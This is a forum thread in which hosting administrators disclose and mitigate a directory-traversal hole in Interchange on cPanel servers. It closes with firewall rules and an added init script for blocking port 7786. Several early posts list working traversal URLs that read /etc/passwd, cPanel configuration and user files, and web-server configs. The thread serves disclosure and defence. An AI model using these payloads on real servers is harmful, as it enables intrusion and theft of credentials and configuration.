Stormtrooper

Active Member
Dec 18, 2001
Ok redhat users, try this one on your server:

http://YOURSERVER.COM:7786/../../../../../../../../../etc/passwd

let me know if you see anything strange....
 

feanor

Well-Known Member
Aug 13, 2001
confirmed- gaping hole in Interchange.

AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

researching now.
 

itf

Well-Known Member
May 9, 2002
It is not necessary to use "../" 9 times after 7786/; 6 times are enough

http://domain.com:7786/../../../../../../etc/passwd
http://domain.com:7786/../../../../../../etc/group
http://domain.com:7786/../../../../../../etc/named.conf
http://domain.com:7786/../../../../../../root/anaconda-ks.cfg
http://domain.com:7786/../../../../../../usr/local/cpanel/etc/cpanel.config

change username with usernames in /etc/passwd
http://domain.com:7786/../../../../../../var/cpanel/users/username


it seems it is not necessary to waste time for SSH connection !!!:)
http://domain.com:7786/../../../../../../etc/httpd/conf/httpd.conf
http://domain.com:7786/../../../../../../etc/proftpd.conf
http://domain.com:7786/../../../../../../etc/hosts


in brief everything in a server.

Damn hole


I stopped Interchange on our critical servers
 

Stormtrooper

Active Member
Dec 18, 2001
/*fix removed*/


CPANEL is too "smart"....it 'un'chmod's the file...if we get something I'll be happy to share it
 

feanor

Well-Known Member
Aug 13, 2001
I submitted a bug to redhat regarding this, using one of their boxes as an example....
hopefully that means they will take action soon.
:p

If anyone has a fix for this that allows IC to stay running, please share... we are working on one internally at this time.

:p
 

itf

Well-Known Member
May 9, 2002
To Stop the Interchange, use these commands in a Root SSH session:

/etc/rc.d/init.d/cpanel3 stop

chmod 600 /usr/local/cpanel/bin/startinterchange

/etc/rc.d/init.d/cpanel3 start
 

Stormtrooper

Active Member
Dec 18, 2001
now, like the "kill interchange" thing I posted...does cpanel find the improper permissions and "fix" it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission
 

itf

Well-Known Member
May 9, 2002
Originally posted by Stormtrooper:

> now, like the "kill interchange" thing I posted...does cpanel find the improper permissions and "fix" it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission

chmod 500 leaves it executable for root and cpanel can run it; use chmod 600 and it will not run until the next cpanel upgrade
 

feanor

Well-Known Member
Aug 13, 2001
just disable interchange in "service manager" via WHManager- it's much, much less painful.

hopefully we have a patch soon.
REDHAT bestow your mighty skillz upon us!
 

bdraco

Guest
/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY


Running the above should allow interchange to continue to function and prevent people from remotely taking advantage of this hole.
 

bert

Well-Known Member
Aug 21, 2001
Thanks Nick. It worked :p
 

techark

Well-Known Member
May 22, 2002
Nick ?

Why am I getting protocol not available when I run those commands?
 

techid

Member
Aug 5, 2002
I also am getting the same thing...

root@capital ]# /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
ipchains: Protocol not available
 

MarlboroMan

Well-Known Member
Dec 7, 2001
Possibly you have to use IPTables instead of IPChains?

/sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

(correct me if the statements are wrong, that's been known to happen)
 

bdraco

Guest
Right .. your machine might have iptables instead of ipchains.

If it still doesn't work
try

modprobe ipchains first

If still not, then you need to recompile your kernel with ipchains or iptables support.
 

joana

Well-Known Member
Sep 29, 2001
Originally posted by MarlboroMan:

> Possibly you have to use IPTables instead of IPChains?
>
> /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
> /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY
>
> (correct me if the statements are wrong, that's been known to happen)

root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT

root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

iptables v1.2.4: Couldn't load target `DENY':/lib/iptables/libipt_DENY.so: cannot open shared object file: No such file or directory

Try `iptables -h' or 'iptables --help' for more information.
 

Annette

Well-Known Member
PartnerNOC
Aug 12, 2001
Try this instead:

/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

iptables uses REJECT as the default instead of DENY.
 

joana

Well-Known Member
Sep 29, 2001
Originally posted by Annette:

> Try this instead:
>
> /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT
>
> iptables uses REJECT as the default instead of DENY.

It worked..Thanks :)
 

MarlboroMan

Well-Known Member
Dec 7, 2001
Another note....

If you reboot your machine, these firewall rules get flushed.

You might want to put those two commands in one of your init scripts until Interchange releases a permanent fix.
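
An added example, not part of the thread and not cPanel or Interchange code: one way to re-apply the two iptables rules from an init script, as the last post suggests, so that a repeated run neither duplicates the rules nor puts the REJECT above the loopback ACCEPT. It assumes an iptables new enough to support `-C` (check); the `IPTABLES` and `PORT` variables and the `lock_down_port` name are illustrative.

```shell
#!/bin/sh
# Added example (not from the thread): re-apply the port 7786 lockdown at boot.
# Assumes an iptables with -C/--check; IPTABLES and PORT are illustrative knobs.
IPTABLES=${IPTABLES:-/sbin/iptables}
PORT=${PORT:-7786}    # Interchange port discussed in the thread

lock_down_port() {
    # iptables stops at the first matching rule, so the loopback ACCEPT has to
    # sit above the REJECT. Insert it at the top of INPUT if it is missing;
    # checking first keeps repeated runs from stacking duplicate rules.
    "$IPTABLES" -C INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 \
            --destination-port "$PORT" -j ACCEPT 2>/dev/null ||
        "$IPTABLES" -I INPUT 1 -p tcp -s 127.0.0.1 -d 127.0.0.1 \
            --destination-port "$PORT" -j ACCEPT || return 1

    # Everything else aimed at the port is refused. REJECT, not DENY:
    # DENY is an ipchains target and iptables cannot load it.
    "$IPTABLES" -C INPUT -p tcp --destination-port "$PORT" -j REJECT 2>/dev/null ||
        "$IPTABLES" -A INPUT -p tcp --destination-port "$PORT" -j REJECT || return 1
}

# Only touch the firewall when asked to: `sh lockdown.sh apply` (as root).
if [ "${1:-}" = "apply" ]; then
    lock_down_port || { echo "failed to lock down port $PORT" >&2; exit 1; }
fi
```

After running it, `iptables -L INPUT -n --line-numbers` should list the loopback ACCEPT for port 7786 above the REJECT.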